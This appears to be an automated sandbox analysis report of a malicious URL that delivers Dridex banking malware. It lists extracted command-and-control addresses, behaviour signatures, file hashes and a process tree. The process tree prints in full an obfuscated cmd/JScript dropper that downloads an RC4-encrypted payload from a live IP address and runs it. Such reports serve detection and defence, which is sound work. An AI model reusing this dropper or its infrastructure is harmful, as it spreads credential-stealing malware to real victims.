Analysis

  • max time kernel: 131s
  • max time network: 154s
  • platform: windows10_x64
  • resource: win10v20210408
  • submitted: 10-09-2021 00:52

General

  • Target: https://ankltrafficexit.xyz/trafficexit
  • Sample: 210910-a7538ahad4

Malware Config

Extracted

  • Family: dridex
  • Botnet: 10111
  • C2:
    104.152.111.198:9676
    92.247.29.75:10172
    133.242.136.130:8194
  • rc4.plain

Signatures

  • Dridex

    Dridex (also known as Bugat/Cridex) is a form of malware that specializes in stealing bank credentials.

  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 40 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" https://ankltrafficexit.xyz/trafficexit
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:664
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:664 CREDAT:82945 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3948
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "hX1ZytEytd" "http://31.44.3.102/?NTk1NzM2&JGsABzK&fhfghddfsdf=twix&dsfdffg43t=TKNbP0fOH0eD2MjN2LHTRcHsLlni0urBDV2rtl7yQ1mH9PoufLZQO1fijE2Fc1AznI0PUF5H8K6si0WBwUXNgp_R-CWPYAh1otKWJA&ogfgafgn4=wH3QMvXcJwDMFYPJKeXD&sdfsdfdfg=why&cxssdvxcv=109hbobs.102fq101.406y2p1j0&IHTvMTk4NjI=" "2""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:712
        • C:\Windows\SysWOW64\wscript.exe
          wsCripT //B //E:JScript 3.tMp "hX1ZytEytd" "http://31.44.3.102/?NTk1NzM2&JGsABzK&fhfghddfsdf=twix&dsfdffg43t=TKNbP0fOH0eD2MjN2LHTRcHsLlni0urBDV2rtl7yQ1mH9PoufLZQO1fijE2Fc1AznI0PUF5H8K6si0WBwUXNgp_R-CWPYAh1otKWJA&ogfgafgn4=wH3QMvXcJwDMFYPJKeXD&sdfsdfdfg=why&cxssdvxcv=109hbobs.102fq101.406y2p1j0&IHTvMTk4NjI=" "2""
          4⤵
          • Blocklisted process makes network request
          • Suspicious use of WriteProcessMemory
          PID:2844
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c xkrzk.exe
            5⤵
              PID:3476
              • C:\Users\Admin\AppData\Local\Temp\xkrzk.exe
                xkrzk.exe
                6⤵
                • Executes dropped EXE
                • Checks whether UAC is enabled
                PID:3940

    Network

    MITRE ATT&CK Matrix (ATT&CK v6)

    • Defense Evasion: Modify Registry (T1112): 1
    • Discovery: Query Registry (T1012): 1
    • Discovery: System Information Discovery (T1082): 2

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
      MD5: f330f5c2ae65a5afe1a96d38e55ac8fc
      SHA1: 9432e52f3eda1c41fe8812cc010ff8702e2e4b7e
      SHA256: 31503cf9dda5cbac641697611050e3e74fa6db6e6eb6d2e5260d532801423d42
      SHA512: 59a55559cb54384ba57730e326253baf636a067d1c12285496db0b7f2f265feb9ca2ef92ac50611878c1e13acf1320c8016f323132ab1a04fb46c915ca761dbf

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
      MD5: 0ee4330b303531893fd7e8759caba6ef
      SHA1: 943fb59aa8214852114cf6f06c195601b2faf0fe
      SHA256: e1168b49cbe12d54d5b38fe6cd64f7cff690a21e043f7c390bf5ecc9232f5a41
      SHA512: d7aa1f24d3d41be85ffe77a4e6d4f018ef0a324fa97863428b96a337426bde61a79dc38c98ae657ea1ee9b8f43329d6abd2893ce98763565bef32a2cbf86695b

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\B86Z2F34.cookie
      MD5: 303a209c2556ead5715a4ac47d01c9f7
      SHA1: 1bb6cb12dab0a2862305e9ff2192ce2fd86027f9
      SHA256: 7b328e8336b8faac0303b2d9ec7d00df656f17c49fde9c0b01acdaa7bd78f134
      SHA512: 2a1aacb58dd74138085db474ef28d8e90411c68cf81ef6de8453b184cc57cfd125f418a04a2c846374028cd859964fb51f502faf0a97c774db55abfabe729ed7

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\G0C79W80.cookie
      MD5: edcf494e59adcd3dbe3635d814ae9f4c
      SHA1: 0df62e7621cb0e6c8a024a8aad40eb84a25d900c
      SHA256: 54e120a864a3152a4239f6fcd9683fea4a9e7d1d17c77d2c86ab60b74e18dcfd
      SHA512: 8ca6758e0c45ba4516decc4a289473c656b0a4006dad3387c165e775c1a30d9a7fb8726a4ed7c88b81b3add9166ff0c3d7d359a3bdd65a508cb5367b35ca14fc

    • C:\Users\Admin\AppData\Local\Temp\3.tMp
      MD5: 60fc00422b399db85f87d41b8328976d
      SHA1: bb85034acad8025f97e5bb236443debaf8926e4b
      SHA256: c38eb3965155b143c8d72bf219ec6dd985a106ce0776c272470b0019e74fb690
      SHA512: 16fa1a3c187500b5c3867fa05752428496273b73c2960c54d2e34e4833a057392c1f5469c8824fdc3d29c9ece2e65189ee281638ccaae941437a259192591151

    • C:\Users\Admin\AppData\Local\Temp\xkrzk.exe
      MD5: 223dc24b1075564c200030321e21ee09
      SHA1: 76fdfb19ae4f9de19f5c039c16fd519a5f96027f
      SHA256: 9ba5eb35f3869aaba5be3c0dc7bc64ff2de408c3679c13f0b84733da0a78a280
      SHA512: 29f073141709ff88d050282ebffd1d6ad9278068ff78e37537b26e88063664f7d6652abcd15666e3d53d8ef2ef9fb75b59eae0febc1f760a5e73aae3e71c9277

    • memory/664-114-0x00007FFAE0360000-0x00007FFAE03CB000-memory.dmp
      Filesize: 428KB
    • memory/712-116-0x0000000000000000-mapping.dmp
    • memory/2844-117-0x0000000000000000-mapping.dmp
    • memory/3476-119-0x0000000000000000-mapping.dmp
    • memory/3940-122-0x0000000002280000-0x00000000022BC000-memory.dmp
      Filesize: 240KB
    • memory/3940-123-0x0000000000400000-0x000000000051A000-memory.dmp
      Filesize: 1.1MB
    • memory/3948-115-0x0000000000000000-mapping.dmp